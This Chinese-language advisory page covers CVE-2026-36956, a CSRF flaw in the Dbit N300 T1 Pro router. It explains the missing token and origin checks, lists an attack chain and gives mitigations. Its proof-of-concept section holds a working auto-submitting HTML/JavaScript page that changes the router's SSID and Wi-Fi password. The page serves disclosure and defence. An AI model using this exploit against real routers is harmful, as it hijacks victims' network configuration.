CVE-2026-36956 CVSS 8.8 高危

CVE-2026-36956 Dbit N300 T1 Pro路由器CSRF漏洞

披露日期: 2026-04-30

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-36956

漏洞类型

跨站请求伪造 (CSRF)

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Dbit N300 T1 Pro wireless router

漏洞概述

Dbit N300 T1 Pro无线路由器V1.0.0版本存在跨站请求伪造（CSRF）漏洞。该设备Web管理界面未能实施有效的CSRF防护，如缺少令牌验证或来源检查。攻击者可诱导已登录管理员访问恶意链接，利用受害者的浏览器会话向配置接口（如/api/setWlan）发送伪造请求，从而未授权地修改路由器配置，造成严重安全风险。

技术细节

该漏洞的根源在于Dbit N300 T1 Pro路由器Web管理接口在设计上缺乏对跨站请求的有效防御机制。具体表现为，系统在处理关键管理操作时，未生成并验证唯一的Anti-CSRF Token，同时也未对HTTP请求头中的Origin或Referer字段进行严格的同源策略检查。攻击者利用这一缺陷，可以精心构造一个恶意的HTML页面，其中包含指向路由器内部API（如/api/setWlan）的隐藏表单提交或异步请求。一旦已通过身份认证的管理员用户受到诱导访问此恶意页面，其浏览器将自动携带当前有效的会话Cookie向路由器发送请求。由于路由器无法区分请求的真实来源，它将接受并执行这些伪造的指令，导致攻击者能够远程篡改路由器的WLAN配置或其他关键参数。

攻击链分析

STEP 1

侦察

攻击者识别出目标使用的是存在漏洞的Dbit N300 T1 Pro路由器，并确定其管理接口地址。

STEP 2

构造载荷

攻击者编写包含恶意JavaScript或HTML表单的网页，该页面向路由器的/api/setWlan端点发送修改配置的POST请求。

STEP 3

诱导访问

攻击者通过钓鱼邮件或社会工程学手段，诱导拥有管理员权限的用户访问包含恶意代码的网页。

STEP 4

执行攻击

管理员浏览器加载页面时，自动附带有效的Session Cookie向路由器发送请求。路由器验证Cookie有效，执行配置更改，完成攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- Proof of Concept for CVE-2026-36956 CSRF Vulnerability -->
<!-- This code demonstrates a forged request to change WLAN settings -->
<html>
  <body>
    <script>
      // Function to send the malicious request automatically
      function exploit() {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://192.168.1.1/api/setWlan", true);
        xhr.setRequestHeader("Content-Type", "application/json");
        
        // Malicious payload to modify SSID and Password
        var payload = JSON.stringify({
          "ssid": "AttackerControlledSSID",
          "password": "pwned123",
          "security": "wpa2psk"
        });
        
        xhr.send(payload);
        console.log("Malicious request sent to /api/setWlan");
      }
      
      // Trigger the exploit on page load
      window.onload = exploit;
    </script>
  </body>
</html>

影响范围

Dbit N300 T1 Pro V1.0.0

防御指南

临时缓解措施

建议用户在使用完路由器管理后台后立即退出登录，避免在保持登录状态的情况下浏览不明网页。同时，可以通过配置防火墙规则或访问控制列表（ACL），限制仅受信任的内部IP地址才能访问路由器的Web管理界面，以降低被攻击的风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-36956
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-36956
3 Details https://www.cvedetails.com/cve/CVE-2026-36956/
4 VulDB https://vuldb.com/cve/CVE-2026-36956
5 Link http://dbit.com
6 Link https://github.com/kirubel-cve/CVE-2026-36956
7 Link https://github.com/kirubel-cve/CVE-2026-36956

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表